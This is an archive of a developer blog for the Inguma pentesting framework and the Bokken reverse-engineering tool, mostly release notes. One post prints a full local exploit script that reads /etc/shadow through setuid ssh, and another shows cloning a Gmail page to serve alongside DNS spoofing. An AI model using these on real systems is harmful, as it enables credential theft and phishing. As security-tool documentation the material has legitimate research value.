Inguma Development

Bokken 1.6 is more stable and easier to install

2012-01-24T07:50:00.000+01:00

A month and a half after having released Bokken 1.5, the Inguma/Bokken team is proud to present a point release to our baby Bokken. The download page can be found here!

The main changes in 1.6 are:

Fixed a security bug due to a predictable temporary file creation (a Debian developer reported it the very first day in the archive, yay!).
Fixed some obvious usability issues and crashes when opening new files inside Bokken.
Now Bokken is better prepared at using a system-wide pyew, for example, or being installed somewhere else than your home directory (like distributed as a Debian package :-) ). Some of the images and icons were not working previously.
In the meantime, we started to import Bokken 1.5 into Inguma and quickly realized that: a) some of the UI changes scheduled for next Inguma release could fit into Bokken (read here eating up the top toolbar and menubar), and b) a lot of the migration work could be simplified if we use a simpler frame to embed Bokken in (and thus into Inguma in the long run).

This means that when you use Bokken 1.6 you may notice a somewhat unusual menu bar:

Bokken 1.6 running on Windows 7

Inspired by MyPaint, we got rid of menu bars (no more File/Edit/... menus) and together with some other buttons in the top toolbar, we replaced them with a big button that comprises most of the previous functionality:

Close capture of the new toolbar in Bokken 1.6
running on Debian Linux wheezy

In other order of things, we have been releasing .deb packages since the 1.5 release, together with the rest of dependencies (python-radare2, pyew, etc.), and they have reached the official Debian archive (http://packages.debian.org/bokken). Today we are also proud to present a signed APT repository that you can easily add to your /etc/apt/sources.list in your favorite Debian/Ubuntu/Debian-compatible distribution to follow more closely our development:

deb http://deb.inguma.eu/ stable main

For more information and instructions for retrieving the repository signing key, please see the new installation in Debian and derivatives wiki page.

Enjoy it! And remember: please report to the team any bugs you may find, through Redmine, our ticketing system.

Inguma T-Shirts, and updated Inguma server

2012-01-23T05:22:00.002+01:00

The Three Wise Men came for Christmas with some presents:

We partnered with a Spanish site to sell Inguma T-shirts.
Our server has duplicated its physical memory! Yay!

The shirts are available through Camisetas Frikis site (as far as we know, only in Spanish for the moment), and with every purchase, you will be contributing with 3 € to the project (see below!). If you want to order any and Google Translate is not up to the job, the best thing you can do is to write to info(AT)camisetasfrikis.es with your order or any questions. Their staff will reply to you promptly!

With the yearly server renewal we decided to scratch our pockets and spend more money in memory. The web server has been fighting for resources during the last months with the rest of the processes in the box. Now there're cookies for everyone. :-) Maybe with the T-shirts we will be able to subsidize some of our expenses, coming exclusively from our pockets.

Thanks for your time and stay tuned for the upcoming release of Bokken 1.6!

And finally... Bokken 1.5

2011-12-07T10:55:00.000+01:00

Once the development has finished, radare2 0.9 has been released and the project site has been updated, the moment has arrived: Bokken 1.5 is here!

Take a look at the previous post to read some of the new features of this release and keep reading to see most of them in detail; for the rest... install Bokken and enjoy them!

As mentioned before, one of the most important features added is the support of radare2 as backend. So now Bokken can work with either Pyew or Radare, each one having its own advantages and drawbacks.

Most of the development efforts for this release have gone to improve the GUI in order to make it cleaner and easier to use.

The disassembly view has gained in interactivity, and now it features, among others:

Code navigation by clicking over: functions, basic blocks, address, section names, etc...
Add comments, view and follow xrefs or view opcode information by right-clicking on a code line.

The graph tab has been improved mainly if radare backend is used; if so, the graph will show flowgraph or callgraph and popup a xrefs menu if a node is right-clicked.

Even the hexdump has received some love and now has syntax highlighting and selected bytes will be disassembled.

If the radare backend is used, a new tab will be added with extended target information like entry points, symbols, imports, sections and strings.

Do you want to use Bokken to find the exploit of the latest patched vulnerability from your favorite vendor? Congrats! Bokken 1.5 features for the first time a binary diffing plugin that can be used with radare.

Other plugins added are:

Assembler/Disassembler: create and export assembly code snippets in many architectures.
Visual representation of binary sections.
Advanced calculator with many input and output formats.
File magic identification.

Finally, if you have problems with x86 assembly, stack inners or other issues, take a look at the RCE cheat sheet included.

There are many other new hidden features awaiting to be discovered on this release, too much to be mentioned here; take a look at the project documentation to discover and learn about them. Now it's time for you to download and install :-)

Windows installer and debian packages will be available soon but, meanwhile, manual installation is easy and straightforward.

We hope you enjoy this release as much as we did working on it and, as always, send us your feedback, bugs, and requests to our mailing list:

bokken-devel at inguma.eu

Special thanks for this release go to:

@trufae and @earada for radare2, their help and testing
@zxlain for the OSX testing and encouragement
@huahe for the incredible logo

Thanks and stay tuned (in @ingumito)!

A new release is coming

2011-10-26T20:27:00.002+02:00

Once again it's been a long time since our last update. The team has switched gears and now we are in a sprint to finish a new release of Bokken. As you probably know, Bokken is the RCE utility that we use in Inguma, and we have been very busy adding tons of features and polishing the interface.

If Bokken 1.0 had 39 commits, for the new release we are near 200, so expect lots of changes, bug fixes and improvements. Let's view some of the major ones.

The first thing you will notice is that the GUI has changed dramatically, not just to be adapted to the new features but we also have made many changes in order to make it clearer, more intuitive and easier to use. But a picture is worth a thousand words:

"Coming soon", "WIP" or "for the next release" are expressions that the Inguma team doesn't like, so another major feature of Bokken 1.5 has been to remove the "soon" regarding the radare backend! And yes, we made it.

Now Bokken can be used with all the power of radare and the ease of use of our GUI. Take a look at the radare website to learn about the features of this powerful backend.

Also almost all the views/tabs of Bokken have received some amount of love and have new features or improvements like:

The long-awaited code navigation.
Improved flowgraph view.
More interactive hexdump.
Many new features for working with URLs
New plugins like: (yes!) bindiffing, calculator, assembler, and more...

And that's all for now. Complete and detailed information of all the new features will be shown in the upcoming release post.

Don't forget to follow us on the project's twitter and send your ideas and comments to our mailing list:

bokken-devel (at) inguma.eu

Stay tuned.

Inguma 0.4 is out!

2011-09-14T20:11:00.000+02:00

Trying to follow a three months release cycle, today we are proud to announce the next version of the Inguma Project, in short Inguma v0.4. As always, let's see the new features we added this time:

The GUI has been modified and cleaned in order to give more space to the most active areas like the network map, the RCE interface or the exploits/fuzzing areas.

Last opened/saved KB are now easily accesible on the toolbar.
A warning icon appears in the "Logs" tab when new content is available.
The bottom status bar has gained more functionality showing information regarding KB in use and targets or vulnerabilities discovered.

We have updated Bokken subproject to the last stable version available, v1.0. It features an interactive mode, better code disassembly and analysis and better integration with Inguma's GUI. More information about Bokken can be found here.

The systray functionality allows now to hide the Inguma GUI while it's working and it will warn you once the running modules have finished.
A new fuzzing tab has been added to the Exploits workspace with two different fuzzers: Krash and Scapy.

Krash fuzzer has been part of Inguma project for a while but now it can be used directly from the GUI. Just select the target, the packet to be fuzzed and press start. Read more about Krash fuzzer here.
The Scapy fuzzer is a GUI wrapper to the scapy's fuzz function that makes network fuzzing very easy. It's fully drag-and-drop-driven and, in order to start, you just have to compose a packet by dropping layers, select the layers/fields to be fuzzed and select an output directory to save the sent and received packets.

The CLI interface has received some attention again and a few new shortcuts like '?' for help or '..' to go back to the main menu are now available in nearly all the modules.

Inguma CLI now works better on MacOS with autocompletion and key bindings.
All the fuzzing modules are now under the fuzzers category and have been fixed.

Inguma v0.4Copyright (c) 2006-2008 Joxean Koret Copyright (c) 2009-2011 Hugo Teso
Type 'help' for a short usage guide.inguma> nmapscaninguma/nmapscan> ?
Inguma's Nmap Interface Help------------------------------
help Show this helpnmaphelp Show Nmap's helpnmap Execute Nmap with options specifiedexit Exit from nmapscan interface
inguma/nmapscan> ..inguma> ..Exit.

Some additional minor changes include:

A new module to find subdomains is now available.
The option to automatically audit a new target has been added to the "New target" dialog.

Lots of code refactoring and bugs fixed.

Get the new release here while is hot, and stay tuned about the latest Inguma and Bokken developments at the project mailing lists or the Twitter profile.

Rooted CON Inguma video available.

2011-08-16T03:41:00.000+02:00

The Rooted CON media team have released the videos from the RootedForge event that happened in Madrid on March, 3rd 2011. There Hugo Teso talked about the past, present and a bit of the future of the Inguma project. It's only in Spanish, sorry!

RootedForge - Proyecto Inguma - Hugo Teso (Rooted CON 2011) from rootedcon on Vimeo.

Bokken 1.0 has landed

2011-07-05T10:35:00.011+02:00

Today we are releasing a new tool of the Inguma project: Bokken.

In Inguma 0.3, an early version of Bokken was included as the RCE tool of the project.

Now we are giving it as a standalone tool.

Bokken is a GUI for the Pyew tool, a *iew like tool for malware analysis, so with Bokken you can do almost the same as with Pyew but with a nice GUI :-). Actually Bokken can parse and help in the analysis of PE/Elf, PDF and websites; any other file can be also opened and studied but Bokken won't analyze it.

To get a full description of the project features, installation instructions or just get the code go to the project site.

Enjoy the new tool and don't forget to send us the bugs you find, feature requests or any other feedback that you consider can help improve the project.

Welcome to Inguma version 0.3

2011-06-13T11:40:00.008+02:00

The Inguma team is very proud to release version 0.3 of their pentesting and vulnerability research framework. The new release increases stability (mainly the GUI) thanks to lots of bugs fixed, offers a smoother experience and, of course, includes some awesome features:

Together with the new release we would like to introduce our project's new pet, Ingumito. He will keep all our users informed of the project news through his twitter account: @ingumito

A new module has been added to map the IP addresses using the GeoIP library from MaxMind:

By Ctrl + right clicking over a target a new menu entry will allow to remove the target and all its nodes from the map and the KB:

Additional information regarding a vulnerability can be obtained by right clicking over a vulnerability node:

The Add Target dialog must be improved to allow multiple IP addresses and other inputs but, meanwhile, the import dialog now supports a comma-separated CSV file to be used as multiple IP input.

The exploits download and load process has been simplified; download the exploits at the Preferences dialog and use the Search button to load the exploits. Once loaded, this button will search through the exploits DB.

The most important change of this new release is the complete rewrite of the RCE interface and core. OpenDis has been removed, and so the objdump dependency, and a new interface has been added that uses Pyew as backend:

This new interface offers most of the Pyew features in a easy-to-use GUI. Analyzing almost any kind of file or web site is now easier with this new release! This GUI for RCE is a new subproject of Inguma called Bokken and will be released soon in our website as an independent tool. Stay tuned!

The RCE interface will analyze PE, ELF, PDF and web sites, and will open any other file in the hex editor. An image is worth a thousand words, so here you have two thousand of them:

Some minor features added are:

An icon has been added to graph nodes to show the OS of the target when available.
New autosave feature that will save the KB after every module execution to prevent data loss in case of GUI crash. This autosaved KB will be loaded at startup if the user wants.
Single host report option added to the node menu.
Improved performance of ping and scan modules.
More modules have been ported to the GUI, like "identify"; wich has also been added to the list of modules launched on adding a target.
We are now closer to full Windows compatibility as this screenshot demonstrate :-)

We hope you enjoy using this new release as much as we enjoyed making it! Stay tuned of the project news with the Twitter account or the mailing lists. For more information, documentation, reporting bugs and, of course, download the release, visit the project's web site.

This release is dedicated to the hundreds of thousands of Spaniards that gathered on May 15th first in Madrid, then everywhere, to protest against political parties in the now-called #15M movement.

Inguma server reachable over IPv6.

2011-05-09T21:21:00.001+02:00

I just added AAAA records to the zones for inguma.eu and inguma-framework.org! I don't think I broke anything, but just for you to know.

Mailing lists and more in place.

2011-04-27T11:28:00.003+02:00

Since the last post we have been busy, not only fixing bugs in Inguma but also adding some pieces of infrastructure to the project to improve the available facilities to develop Inguma.

Two mailing lists are ready for use: inguma-announce and inguma-devel. Anyone familiar with OSS will infer their purpose.
Redmine has been upgraded to 1.1.2.
We are trying to import all the issues from the Google Code project into Redmine to avoid losing user reports. If you have any bug, report or suggestion, please create a Redmine account to add a new issue or contact our development list!
In the very near future we intend to publish updates also by Twitter to make people aware of our advancements. Keep tuned!

Also do not forget that we are available in #inguma on Freenode IRC network.

Inguma keeps moving...

2011-02-21T16:46:00.001+01:00

First of all we would like to thank you the great welcome you have given to the new release; we will do our best to keep improving the project.

Since the 0.2 release many improvements have been done to Inguma and we will try to show you some of them on this post.

Today we release a new project site and leave Google Code. The dev team has discussed a lot and finally decided to use our previous development site as the main one. You can find it at:

http://www.inguma-framework.org

or, for the lazy ones (including ourselves), the shorter:

http://www.inguma.eu

Lots of bugs have been fixed since 0.2 release and now Inguma should be fairly more stable, mainly the GUI.

As the GUI released at 0.2 had (and still has) many bugs and crashes quite frequently, we added a new Autosave feature. It will save automatically the KB after every module run and try to recover it at every application start. Unless you manually save the KB or reject to load at start it will be available to recover your work.

We have added autofill on targetDialog so you don't have to manually fill the module target, it will be filled automatically with the IP address of the node.

Added tooltips to confusing parameters of the gather dialog with a little description of the available options.

Added picture support on graphs. Actually it shows OS icon when possible or a generic icon when OS is uknown.

Right click on web vuln (OSVDB) at Vulns per port graph opens vulnerability info on browser.

Added more dependency checks (graphviz, Impacket, PySNMP) to help identify and manage start up problems.

Checking:

GTK UI dependencies... OK

WARNING: No route found for IPv6 destination :: (no default route?)

Scapy... OK

Network connectivity... OK

GtkSourceView2... OK

VTE Terminal... OK

Impacket library... OK

PySNMP library... OK

Graphviz binaries... OK

Improved performance of TCP, UCP and ICMP ping modules and "portscan" module (SYN and ACK). So now add target dialog has improved a lot the speed by using "portscan" instead of "tcpscan" and is more complete by using "identify" on opened ports.

Half of the users told us that they wanted module output on new dialogs and the other half prefered to have it on the "Logs" tab at the bottom. So finally we changed module output behavior using SHOW_MODULE_WIN at config.py. If set to true it will popup module ouput on a new dialog but if set to False it will drop it to the Logs Tab.

For more information do not hesitate to contact the team using any of the options listed on this wiki page.

We are back!

2011-01-16T23:05:00.003+01:00

It's been a long time since our last post and most of the people thought that Inguma was dead, but we are back and we have some news for you. Let's see what has changed since our last post.

Today we launch a new site for the project hosted on Google Code. Almost all the documentation has been moved from the old site and many more has been added. There are still lots to be added but there is enough to get started using the software.

Of course many bugs have been fixed, some new modules added and even a few have been removed but the most exciting feature we have added to this release is a fancy new GUI.

The old Qt GUI has been removed and the new one is PyGtk based, of course the good command line one is still there. This new GUI can't be considered yet stable and not all the modules are actually working properly on it but it's stable enough to be released and to perform most of the basic functionalities.

If the command line one is like a toolbox with high scripting capabilities, the GUI is an attempt to integrate all those tools into a common workflow and add many data visualization aids. The main command line interface should work on the same platforms that before (Linux, Windows and MacOS) but the GUI isn't ready neither tested on other platform that Linux.

Instead of writing here all the new features or a deep description of the new GUI you can go directly to the Console or GUI quick start guides and read about them. The code can be downloaded packed in a tar.gz or from the mercurial repository if you prefer to have your code up to date with all the new features that we will keep adding.

That's all for the moment; thanks to all the people that has supported me during this time and I hope you enjoy using and, hopefully, improving this new release.

Exploits for all!

2009-01-15T22:20:00.001+01:00

It's been a while since my last post, as always ;), and today we are going to see a new module that almost every Inguma's user has been waiting.

Actually the Inguma's development team is just two persons and the project is still young and lacks many features but one of them is even more necessary: exploits. Inguma itself requires lots of development so we can't spent much more time developing exploits but with this module I will try to solve this problem a little.

The new module, called 'localxpl' (local exploits), will allow Inguma to download and manage exploits from two important exploits repositories: Milw0rm an Packetstorm. Let's see it in action in order to see what and how can do this new module. The new module can be found under the category 'exploits' and once you type 'localxpl' you will enter into it's interface:

inguma> show exploits



List of exploit modules

-----------------------



(...)

localxpl      A Module to fetch and manage exploits from many sources

(...)



inguma> localxpl

Exploits from Milw0rm not yet downloaded

Exploits from Packetstorm not yet downloaded



Actual remotedb selected: milw0rm

LOCXPL>

We can see that it informs us that we haven't downloaded any exploit yet and that, by default, the repository to work with is milw0rm. To see the options we have just to type 'help':

LOCXPL> help



Inguma's Local Exploit DDBB Help

--------------------------------



remotedb                     Database to work with: milw0rm or packetstorm

fetch                        Download exploits from remotedb

help                         Show this help

exit                         Exits the DDBB

As we have no local repository yet, the options shown are just a few: select the repository to get (milw0rm or packetstorm) and download the exploits from the selected repository. As we have no other choice with milw0rm selected, let's download the exploits with the command 'fetch' and see the new options:

LOCXPL> fetch

Dir:  /inguma/modules/exploits/

Downloading  http://www.milw0rm.com/sploits/milw0rm.tar.bz2

Extracting files...

Exploits successfully downloaded on Thu Jan 15 20:19:38 2009

Operation Complete

Now we know that exploits are going to be stored under directory exploits and that the download finished fine; the path to store the exploits can be modified easily on the source of the module. Type 'help' again to see the new options:

Inguma's Local Exploit DDBB Help

--------------------------------



remotedb                     Database to work with: milw0rm or packetstorm

fetch                        Download exploits from remotedb



Manage Milw0rm DDBB commands

----------------------------



list                         Shows list of local exploits. VERY VERBOSE

search                       Search exploits; use the 'tag' variable

Example: to search for windows exploits

'tag Windows'

rport                        Shows exploits afecting a remote port

Define the port using command 'port 22'

Port must be numeric: 22 intead of SSH

correlate                    Searches the DDBB for all exploits matching rport

for all the ports of a scaned machine. Specify

target machine with 'target 192.168.0.1'

Be sure to scan the machine before!

show                         Shows selected exploit source code

Select exploit using xplpath command:

'xplpath path/to/exploit'



help                         Show this help

exit                         Exits the DDBB

Now that we have some exploits downloaded we have some more operations to perform with them. For example we can list all the exploits downloaded from milw0rm just by typing 'list' but this will output lots of them so... Also we can now search all the exploits for a given keywords just by setting it with the commands 'tag' and 'search':

LOCXPL> tag openssh

New search tag:  openssh

LOCXPL> search

Searching milw0rm local DDBB for tag: openssh

./platforms/linux/local/258.sh glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x

We got one match for an exploit related to 'OpenSSH' and now we can get more information just by displaying its contents; just set the path to th exploit using the command 'xplpath' and the path you got from the search results and type show:

LOCXPL> xplpath ./modules/exploits/milw0rm/platforms/linux/local/258.sh

./modules/exploits/milw0rm/platforms/linux/local/258.sh set to show.



LOCXPL> show

# Charles Stevenson 

# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)

# This exploits is for glibc >= 2.1.9x.

# (****krochos@linuxmail.org****)

# Edit this if you have a problem with path



ssh=/usr/bin/ssh

traceroute=/usr/sbin/traceroute

FILE=/etc/shadow        # File to read

###############################################################################



echo "$ssh"

echo "[*] Checking permisions..."



if [ ! -u $ssh ]; then

echo "$ssh is NOT setuid on this system or does not exist at all!"

if [ ! -u $traceroute ]; then

echo "$traceroute is NOT setuid on this system or does not exist at all!"

exit 0

fi

fi



export RESOLV_HOST_CONF=$FILE



echo "[*] Glibc bug found by Charles Stevenson "

echo "[*] krochos@linuxmail.org"

sleep 1

echo "[*] export  RESOLV_HOST_CONF=/etc/shadow"

ssh lt 2>/tmp/.resolv

cat /tmp/.resolv |  cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '



# milw0rm.com [2001-01-25]

Another option is to list all the exploits affecting a given remote port using the command 'rport' after specifying the remote port with the command 'port' as explained in the help; the command 'correlate' will be shown late on this post.

Now that we have seen what we can do with the Milw0rm repository let's see what can we do with Packetstorm; first we switch to packetstorm with the command 'remotedb' and type help:

LOCXPL> remotedb packetstorm

New remotedb selected:  packetstorm

LOCXPL> help



Inguma's Local Exploit DDBB Help

--------------------------------



remotedb                     Database to work with: milw0rm or packetstorm

fetch                        Download exploits from remotedb

years                        A space separated list of years to fetch

Example: 'years 06 07 08'

help                         Show this help

exit                         Exits the DDBB

As with milw0rm, until we get the exploits we have few choices. But now we have one difference, packetstorm classify it's exploits by year so we can specify the years we want to fetch with the command 'years'; by default exploits from the years 2007/08 will be downloaded.

LOCXPL> years 08

Years:  ['08']

LOCXPL> fetch

Dir:  /inguma/modules/exploits/packetstorm/

Start: 2008

Downloading: http://packetstormsecurity.org/0812-exploits/2008-exploits.tgz ...

Done. Extracting files...

Done: 2008

Exploits successfully downloaded on Thu Jan 15 20:28:44 2009

Almost the same as with milw0rm till now. From now on if we fetch exploits from milw0rm or packetstorm they will be updated, and if we specify 'years 07 08' and fetch again only the exploits of year 2007 will be downloaded. So let's see the new options we have now for the packetstorm repository:

Inguma's Local Exploit DDBB Help

--------------------------------



remotedb                     Database to work with: milw0rm or packetstorm

fetch                        Download exploits from remotedb

years                        A space separated list of years to fetch

Example: 'years 06 07 08'



Manage Packetstorm DDBB commands

--------------------------------



list                         Shows list of local exploits. VERY VERBOSE

Also navigate the exploits listing going with

your browser to, for example:

/inguma/modules/exploits/packetstorm/08-exploits/0801-exploits/index.html

search                       Search exploits; use the 'tag' variable

Example: to search for windows exploits

Example: 'tag Windows Vista'

Optionaly append a year to search only on exploits of this year

Example: 'year 08'

show                         Shows selected exploit source code

Select exploit using xplpath command:

'xplpath path/to/exploit'



help                         Show this help

exit                         Exits the DDBB

As we can see options are almost the same that we have with milw0rm but here we can't search by port; if look at the help of the command list we can see that we can browse the exploits of this repository by opening the file index.html that exists on each directory of the repository, just change year and month on the path.

And the last command we are going to see is the 'correlate' that we can find in the milw0rm help. With this command we can automatically search all the exploits that may affect all the ports that have been reported open by the port scans. So, the first thing we need to perform is a port scan:

inguma> target = '192.168.0.1'

inguma> tcpscan

Scanning port 17004 (417/417)

Open ports

----------



Port 1720 is open

Port 23/telnet is open

Once we get the open ports for this target we enter into the 'localxpl' interface to correlate the results with the existing exploits. As we already have downloaded the exploits we are now informed with the dates of the downloads so we can decide if we need to update.

inguma> localxpl

Last Milw0rm DDBB update: Thu Jan 15 20:19:38 2009

Last Packetstorm DDBB update: Thu Jan 15 20:28:44 2009



Actual remotedb selected: milw0rm

Now we just need to specify the target we have scanned and we want to correlate and launch the command 'correlate':

LOCXPL> target 192.168.0.1

Target set for correlation: 192.168.0.1



LOCXPL> correlate

Searching exploits available on milw0rm DDBB for port TCP/23



/inguma/modules/exploits/milw0rm/rport/23/346.c

/inguma/modules/exploits/milw0rm/rport/23/3293.sh

/inguma/modules/exploits/milw0rm/rport/23/254.c

/inguma/modules/exploits/milw0rm/rport/23/621.c

/inguma/modules/exploits/milw0rm/rport/23/89.c

/inguma/modules/exploits/milw0rm/rport/23/409.c



Searching exploits available on milw0rm DDBB for port TCP/1720



No exploits found for port TCP/1720

Ok, this is not enough to get accurate results but it's a starting point so, once I improve the scanning modules, to get and store also information about the services listening on each port that's all we have.

So that's all folks; I hope that I will improve this module soon and also get new interesting ones. To finish, a tip for my next module: PIG. ;)

After a long while...

2008-12-27T17:49:00.002+01:00

Hi!

After a long while Hugo & I decided to prepare the new Inguma version (Release 0.1.0) with some new features. There are new modules in the new version, as the ASNQuery module or the NMap fronted both created by Hugo, and new features & tools.

The 2 most interesting new tools added to the framework are, for sure, the PCAP-based fuzzer and the OpenDis Binary Navigator.

The PCAP based fuzzer works this way: Record with your favourite sniffer a session communicating with your target server application, save the recorded session as one PCAP file and create a new PCAP based fuzzer as the following:

-----------------------------------------------------------------------------------

import sys

from scapy import *

from fuzzpcap import *

from lib import libfuzz



def main(pcapFile, dest, destPort):



replayList = []



pktList = rdpcap(pcapFile)



for pkt in pktList:

tcpPkt = pkt[TCP]

flags = tcpPkt.sprintf("%flags%")

dst = pkt.sprintf("%IP.dst%")

dstPort = tcpPkt.sprintf("%TCP.dport%")



if flags == "PA" and dst == dest and dstPort == destPort:

# Get the packet's data

pktBuf = str(tcpPkt[Raw])

replayList.append(pktBuf)



replayer = CReplayFuzzer(dest, destPort, replayList)

replayer.verbose = False # Show every packet that will be sent?

replayer.timeout = 0.3   # Time to wait for a response?

replayer.waitResponse = True # Wait for a response?

replayer.startPacket = 0     # Start from packet number 0

replayer.dontWaitFor = xrange(0, 1024) # Don't wait for a response for these packets

replayer.fuzz() # Start fuzzing now!

-----------------------------------------------------------------------------------

That easy. For some (undocumented) protocols this is a fast way to start fuzzing a complete communication session without having any knowledge about the communication protocol.

Another interesting tool (as previously pointed) is the OpenDis Binary Navigator. It's a frontend for OpenDis databases (the format of the databases changed from cpickle objects to SQLite format databases). With this tool you might upload (this is a webserver, bind it to 127.0.0.1 if you don't want to open this to your network) programs to be analyzed by OpenDis and generate an SQLite based database. This database can be navigated using the OpenDis Binary Navigator.

The most curious features of OpenDis Binary Navigator right now are the ability to generate basic block diagrams (you need Graphviz) and the option to calculate the CC (Cyclomatic Complexity) of a procedure. You might see screenshots at the end of this post.

Well, that's all at the moment. I will try to upload the new version of Inguma to sourceforge before the end of the year. Happy XMas and happy new year!

More toys for Inguma

2008-09-09T23:37:00.001+02:00

Hi all,

Last days we have keep working on more modules for Inguma, so let's see the result of this work.

First we have two new modules that could be very useful when used together with the DnsSpoof; both modules are located under the Gather category and are a TCP proxy and a Web Server with some basic crawling capabilities.

inguma> info webserver

crawl = 

target = 

port = 



inguma> info tcpproxy

target = 

port = 

newport = 

inguma>

The web server will crawl a web page, if crawl variable is set to 'True', and after that will start serving that page at the specified port.

inguma> info webserver

crawl = 

target = 

port = 

inguma> crawl = True

inguma> target = 'http://mail.google.com'

inguma> port = 80

inguma> webserver

Crawl True

Crawling page: http://mail.google.com

Parsing image links...

Parsing href links...

Crawled page saved at /home/hteso/Proyectos/inguma-dev/data/web/index.html

serving at port 80

localhost - - [09/Sep/2008 23:08:17] "GET / HTTP/1.1" 200 -

localhost - - [09/Sep/2008 23:08:17] "GET /favicon.ico HTTP/1.1" 404 -

This can be funny ;)

On the other hand we have the TCP Proxy...

inguma> info tcpproxy

target = 

port = 

newport = 

inguma> target = 'http://www.google.es'

inguma> port = 80

inguma> newport = 80

inguma> tcpproxy

Starting TCP proxy

Redirecting: localhost:80 -> http://mail.google.com:80

inguma> Creating new session for 127.0.0.1 55231 

Creating new pipe thread   ( ('127.0.0.1', 55231) -> ('74.125.39.104', 80) )

1 pipes active

Creating new pipe thread   ( ('74.125.39.104', 80) -> ('127.0.0.1', 55231) )

2 pipes active



0010   6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D    meta http-equiv=

0020   22 63 6F 6E 74 65 6E 74 2D 74 79 70 65 22 20 63    "content-type" c

0030   6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D    ontent="text/htm

0040   6C 3B 63 68 61 72 73 65 74 3D 75 74 66 2D 38 22    l;charset=utf-8"

0080   79 20 7B 66 6F 6E 74 2D 66 61 6D 69 6C 79 3A 20    y {font-family: 

0090   61 72 69 61 6C 2C 73 61 6E 73 2D 73 65 72 69 66    arial,sans-serif

...

One of the next improvements for this module will be the ability to trap and modify requests and answers.

Finally we have added a new section called RCE that will group all the tools for working with binaries:

inguma> show rce



List of rce modules

-------------------



debugger                Userland Debugger

hexdump                 A simple HexDump utility



The first tool is a simple Hexdump utility.



inguma> info hexdump

target = < Target file >

lines = 

inguma> target = '/bin/cat'

inguma> hexdump



/bin/cat

--------------------------------------------------------------------------

000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 | ELF............

000010: 02 00 03 00 01 00 00 00 c0 8c 04 08 34 00 00 00 | ........�...4...

000020: 78 66 00 00 00 00 00 00 34 00 20 00 07 00 28 00 | xf......4. ...(.

000030: 1b 00 1a 00 06 00 00 00 34 00 00 00 34 80 04 08 | ........4...4...

000040: 34 80 04 08 e0 00 00 00 e0 00 00 00 05 00 00 00 | 4...�...�.......

000050: 04 00 00 00 03 00 00 00 14 01 00 00 14 81 04 08 | ................

000060: 14 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 | ................

000070: 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 | ................

000080: 00 80 04 08 c0 63 00 00 c0 63 00 00 05 00 00 00 | ....�c..�c......

000090: 00 10 00 00 01 00 00 00 c0 63 00 00 c0 f3 04 08 | ........�c..�

0000a0: c0 f3 04 08 dc 01 00 00 64 03 00 00 06 00 00 00 | ��..�...d.......

0000b0: 00 10 00 00 02 00 00 00 d4 63 00 00 d4 f3 04 08 | ........�c..�

0000c0: d4 f3 04 08 d0 00 00 00 d0 00 00 00 06 00 00 00 | ��..�...�.......

0000d0: 04 00 00 00 04 00 00 00 28 01 00 00 28 81 04 08 | ........(...(...

0000e0: 28 81 04 08 20 00 00 00 20 00 00 00 04 00 00 00 | (... ... .......

0000f0: 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 | ....Q�td........

000100: 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 | ................

000110: 04 00 00 00 2f 6c 69 62 2f 6c 64 2d 6c 69 6e 75 | ..../lib/ld-linu

000120: 78 2e 73 6f 2e 32 00 00 04 00 00 00 10 00 00 00 | x.so.2..........

--------------------------------------------------------------------------

jump to...

And the last tool that we will review today is a ring 3 debugger coded in python and that you can find in this web site.

inguma> debugger

Loading VDB Modules: 

... Complete

vdb > help



Documented commands (type help ):

========================================

alias     bpedit  config  fds     maps     mode    regs    snapshot  threads 

attach    break   detach  go      mem      ps      script  stepi     vstruct 

bestname  bt      dis     ignore  memdump  python  server  struct    writemem

bp        call    exec    lm      meta     quit    signal  syms    



Undocumented commands:

======================

EOF  help  sections



vdb > ps

[Pid]   [ Name ]

1       /sbin/init

2764    /sbin/udevd --daemon 

4458    /sbin/portmap 

4482    /sbin/rpc.statd 

4611    /sbin/getty 38400 tty4 

4612    /sbin/getty 38400 tty5 

4614    /sbin/getty 38400 tty2 

4617    /sbin/getty 38400 tty3 

4618    /sbin/getty 38400 tty6 

4813    /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket 

...

Actually the module just starts the debugger (either in console or graphical mode) but we are working on a more deep integration of the tool with Inguma and, may be, a programmatic RCE environment with the debugger, OpenDis, ...

That's all for the moment, stay tuned!!

Hugo Teso

New libraries in the Inguma Framework

2008-08-31T19:05:00.002+02:00

Hi!

The, currently in development, new version of Inguma will include modules for Informix and IBM DB2 databases. Right now, for IBM DB2 databases we don't have many things, just a discover module (at the moment) but I'm working in a Python module for the DRDA protocol.

Also, and it's almost finished, I'm working in a pure Python Informix library. This library just "works". It generates valid packets for login, queries and various other Informix commands (such as DBList, etc...). It wasn't a hard job! I will explain a bit how the Informix communication protocol works:

The 1st packet the client sends to the database server is a pure ASCII packet with the following format:

buf = "sq"

buf += base64.b64encode("the total size of the packet").strip("==")

buf += "BPQAAsqlexec"



data  = ' %s -p%s %s %s -d%s -f%s DBPATH=%s DBMONEY=%s CLIENT_LOCALE=%s'

data += ' SINGLELEVEL=%s '

data += 'LKNOTIFY=%s LOCKDOWN=%s NODEFDAC=%s CLNT_PAM_CAPABLE=%s '

data  = data % (self.username, self.password, self.version, self.serialNumber,

self.databaseName,

self.ieee, self.databasePath, self.databaseMoney,

self.clientLocale, 

self.singleLevel, self.lkNotify, self.lockDown, 

self.noDefDac,

self.clientPamCapable)

When the server receives this packet validates the username and the password (which is, BTW, sent in plain text) and, also, the database name if it was passed. Regardless of whether the username and password are valid, the server will always answer with interesting data to the client, such as the install path, complete version, etc... (BTW, there is a working module to gather information from an Informix Database in the private version of Inguma and will be released in the next release).

The response sent from the server to the client will have the following format:

"0x00 0x05 0x02 0x00*12 ieee name banner serial dbpath protocol hostname terminal installpath"

The first byte (0x00 or 0x01) is the "isValidUser" byte. If the username and password are OK, the server will answer with a value of 0x01. Otherwise, the value will be 0x0. The 2nd and 3rd bytes indicates if the database selected exists and the user has privilege to connect to. A normal answer (if the database exists and, also, the username & password are both valid) is 0x05 0x02. All the rest of the data are C strings.

